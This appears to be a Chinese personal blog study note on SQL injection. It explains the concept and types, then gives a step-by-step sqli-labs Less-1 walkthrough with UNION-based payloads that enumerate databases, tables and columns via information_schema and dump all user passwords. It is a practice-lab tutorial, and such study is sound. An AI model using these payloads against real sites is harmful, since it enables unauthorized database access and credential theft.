<!DOCTYPE HTML>
<html>

<head>
	<!-- hexo-inject:begin --><!-- hexo-inject:end --><link rel="bookmark"  type="image/x-icon"  href="/img/logo.png"/>
	<link rel="shortcut icon" href="/img/logo.png">
	
			    <title>
    DV.K
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="/css/mic_main.css" />
    <link rel="stylesheet" href="/css/dropdownMenu.css" />
    <meta name="keywords" content="DV.K" />
    
    	<script async src="//busu.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css" />
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			

<script src="/js/jquery.min.js"></script>
<script src="/js/jquery.scrollex.min.js"></script>
<script src="/js/jquery.scrolly.min.js"></script>
<script src="/js/skel.min.js"></script>
<script src="/js/util.js"></script>
<script src="/js/main.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->
	
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css" />
<link rel="stylesheet" href="/css/typo.css" />
<!-- 文章页 -->
<body class="is-loading">
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">DV.K</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special" >
            <ul class="menu links" >
			<!-- Homepage  主页  --> 
			<li >
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        <a class="category-link" href="/categories/CTF/">CTF</a></li><li><a class="category-link" href="/categories/Crypto/">Crypto</a></li><li><a class="category-link" href="/categories/Language/">Language</a></li><li><a class="category-link" href="/categories/Operation/">Operation</a></li><li><a class="category-link" href="/categories/Reading/">Reading</a></li><li><a class="category-link" href="/categories/Tools/">Tools</a>
	                    </ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        <li class="active">
	            <a href="#s1">归档</a>
	                    <ul class="submenu">
	                        <li>
	                        <a class="archive-link" href="/archives/2020/06/">June 2020</a></li><li><a class="archive-link" href="/archives/2019/10/">October 2019</a></li><li><a class="archive-link" href="/archives/2019/08/">August 2019</a></li><li><a class="archive-link" href="/archives/2019/07/">July 2019</a></li><li><a class="archive-link" href="/archives/2019/06/">June 2019</a></li><li><a class="archive-link" href="/archives/2019/05/">May 2019</a></li><li><a class="archive-link" href="/archives/2019/03/">March 2019</a></li><li><a class="archive-link" href="/archives/2019/02/">February 2019</a></li><li><a class="archive-link" href="/archives/2019/01/">January 2019</a></li><li><a class="archive-link" href="/archives/2018/12/">December 2018</a></li><li><a class="archive-link" href="/archives/2018/11/">November 2018</a></li><li><a class="archive-link" href="/archives/2018/10/">October 2018</a>
	                    </ul>
	        </li>
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://github.com/DVKunion" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="500px" href="https://blog.csdn.net/D_V_K_" target="_blank" rel="noopener">
                            <i class="icon fa fa-500px"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main" >
            <div class ="post_page_title_img" style="height: 25rem;background-image: url(http://dvkunion.cn/blog/20190506/vhicMCTjS2F2.jpg);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;" >
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2 >Web-SQL</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <h1 id="Web-SQL"><a href="#Web-SQL" class="headerlink" title="Web-SQL"></a>Web-SQL</h1><hr>
<center><small>2019-5-6</small></center>

<p>这周开始 SQL注入 的学习和总结，从基础部分到深入的理解各种注入手段。</p>
<center><small>2019-5-14</small></center>

<p>一个重要的数据库:information_schema<br>三张重要的表:schemata、tables、columns</p>
<center><small>华丽的分割线</small></center>

<hr>
<h3 id="0x01-什么是SQL注入"><a href="#0x01-什么是SQL注入" class="headerlink" title="0x01- - 什么是SQL注入"></a><b>0x01- - 什么是SQL注入<b></b></b></h3><p>在动态的Web应用中，数据库是不可缺少的元素之一。动态类的网站通常需要动态脚本在后台进行不断的数据库操作，将数据从数据库中取出或是修改。进行这种操作的脚本通常会构造出一个符合 SQL语法 的查询语句，然后通过数据库-脚本语言的插件，对数据库进行增删改查的操作。</p>
<p>SQL注入，就是在脚本语言构造查询语句的时候，通过传入一些特殊的字符或是特定的数据库函数参数，从而实现对数据库的任意操作，达到攻击目的。</p>
<p>SQL语句具有灵活、通用的优点，所以通常动态SQL语句都是在执行的过程中创建的。在这个过程中如果没有对一些敏感函数和特殊符号进行过滤，构造出的SQL语则会可能带有强力的攻击性。</p>
<p>手画一幅图来更好的表达我的意思：</p>
<p><img src="http://dvkunion.cn/blog/20190506/oCD96K2MLzRo.png" alt="mark"></p>
<p>灵魂画手。但是应该可以简单的表达出一次Sql注入攻击。</p>
<p>练习SQL注入时，可以通过LAMP环境搭建一个练习靶场，如sqli-labs、dvwa等等。</p>
<p>放一个 Ms17010实验室的在线SQLi-labs环境，在这里感谢大佬贡献的练习靶机:</p>
<p><a href="http://43.247.91.228:84/" target="_blank" rel="noopener">http://43.247.91.228:84/</a></p>
<h3 id="0x02-SQL注入的原理"><a href="#0x02-SQL注入的原理" class="headerlink" title="0x02- - SQL注入的原理"></a><b>0x02- - SQL注入的原理<b></b></b></h3><p>首先我们看一个正常的SQL查询语句：</p>
<p><code>select * from users where id = $id</code></p>
<p>正常的操作下，$id 是我们输入的一个变量，当我们输入 id=1 时，数据库会带入这条SQL语句 进行查询 id=1 的用户信息，并将查询结果反馈给我们。</p>
<p>当我们进行攻击时，我们输入 $id=1 and 1=1 ,没有过滤的情况下，数据库会带入 $id 内所有的参数进行查询，查询语句则变成了这样：</p>
<p><code>select * from users where id = 1 and 1=1</code></p>
<p>id=1 为真，1=1 也为真，与逻辑下 查询结果为真。所以依旧会查询到 id=1 的用户信息。当我们换成 and 1=2时:</p>
<p><code>select * from users where id = 1 and 1=2</code></p>
<p>此时 1=2为假，与逻辑下 查询结果为假，因此查询不到任何数据，返回结果为空。</p>
<p>据此即可判断，此处存在SQL注入漏洞，我们可以构造更多的 payload 进行攻击。</p>
<h3 id="0x03-SQL注入的分类"><a href="#0x03-SQL注入的分类" class="headerlink" title="0x03- - SQL注入的分类"></a><b>0x03- - SQL注入的分类<b></b></b></h3><p>常见的注入攻击有：报错注入、盲注、Union注入等等。</p>
<p>按照工具：手动注入、工具注入。</p>
<p>进阶：宽字节注入、时间注入、堆叠注入、二次注入、cookie注入、base64注入、XFF注入。</p>
<p>说到底，SQL注入是在利用输入过滤不严谨和数据库的SQL语句特性进行攻击。所以对于不同的数据库攻击的方式也不完全相同。这里大多数例子都以 mysql 数据库为例。</p>
<p><b> Union 注入</b></p>
<p>通过 SQL语法 中的 union select 联合查询进行注入。</p>
<h3 id="0x04-SQL注入练习"><a href="#0x04-SQL注入练习" class="headerlink" title="0x04- - SQL注入练习"></a><b>0x04- - SQL注入练习<b></b></b></h3><p>练习部分主要以sqli-labs为主，外加一些CTF平台的经典题目。</p>
<h4 id="sqli-labs"><a href="#sqli-labs" class="headerlink" title="sqli-labs"></a><font color="blue">sqli-labs</font><br></h4><p><b>Less-1:GET-Error Based-String quotes - String</b></p>
<p>第一题开头应该是最简单的，首先带入’单引号进行fuzz测试</p>
<p><img src="http://dvkunion.cn/blog/20190514/mWNCxs98K1AU.png?imageslim" alt="mark"></p>
<p>发现报错，并切后面出现了 limit 字样，说明后面存在多余的语句，我们需要注释掉后面的语句才能运行。<br>传参 id=1’ order by 1%23 判断列数，在4时报错</p>
<p><img src="http://dvkunion.cn/blog/20190514/NB1YtWkMUYxo.png?imageslim" alt="mark"></p>
<p>说明一共存在三列，我们开始构造union查询：<br>id=-1’ union select 1,2,3%23</p>
<p><img src="http://dvkunion.cn/blog/20190514/kImfWSWEjnlr.png?imageslim" alt="mark"></p>
<p>得到了数据对应的列的位置，我们在这几个位置使用union对数据进行其他数据库查询即可：</p>
<p>id=-1%27%20%20union%20select%201,user(),3%23 查询数据库用户名</p>
<p><img src="http://dvkunion.cn/blog/20190514/H85ENgRVg8Pf.png?imageslim" alt="mark"></p>
<p>id=-1%27%20%20union%20select%201,database(),3%23 查询当前数据库名</p>
<p><img src="http://dvkunion.cn/blog/20190514/u677htpChFE9.png?imageslim" alt="mark"></p>
<p>我们也可以直接爆所有存在的数据库：</p>
<p>id=-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20%23</p>
<p><img src="http://dvkunion.cn/blog/20190514/bign3RmOAjcc.png?imageslim" alt="mark"></p>
<p>然后我们可以利用 mysql中的一个特殊数据库进行爆表：</p>
<p>id=-1’ union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database()%23</p>
<p>group_concat可以将内容按照要求的以默认的逗号打印出来，占一列的值。</p>
<p><img src="http://dvkunion.cn/blog/20190514/KVmUo4gN7P9t.png?imageslim" alt="mark"></p>
<p>爆出了表名，我们可以继续查询表内字段名：</p>
<p>id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’emails’%23</p>
<p><img src="http://dvkunion.cn/blog/20190514/nyVNYaN18SFr.png?imageslim" alt="mark"></p>
<p>同样也可以对users表进行查询：</p>
<p>id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’%23</p>
<p><img src="http://dvkunion.cn/blog/20190514/TLBktVJWYTJd.png?imageslim" alt="mark"></p>
<p>发现存在关键字段password,我们去爆出所有的password</p>
<p>id=-1’ union select 1,2,group_concat(password) from security.users %23</p>
<p><img src="http://dvkunion.cn/blog/20190514/i6l6StGSBHHz.png?imageslim" alt="mark"></p>
<p>得到所有人的密码。</p>
<p>这样是通过了Union进行的注入，同样这题也可以通过报错注入得到结果。</p>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2019/05/06/Web-SQL/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'http://yoursite.com/2019/05/06/Web-SQL/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a href="https://hexo.io/zh-cn/" style="border-bottom: none;">hexo</a></li>
                <li>Design:MICCALL</li>
            </ul>
            <!--test-->
            <!--社会主义好-->
            <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
            <script type="text/javascript" src="/js/mouse.js"></script>
            <!--live2d-->
            <div id="app">
            <canvas id="live2d" width="280" height="250" class="live2d"></canvas></div>
            <script type="text/javascript" src="device.min.js"></script>

            <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
            	<span id="busuanzi_container_site_pv">2020/06/30    总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"left","width":100,"height":175},"mobile":{"show":true},"log":false});</script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({"tex2jax":{"inlineMath":[["$","$"],["\\(","\\)"]],"skipTags":["script","noscript","style","textarea","pre","code"],"processEscapes":true},"TeX":{"equationNumbers":{"autoNumber":"AMS"}}});
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end --><script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"left","width":100,"height":175},"mobile":{"show":true},"log":false});</script></body>



 	
</html>
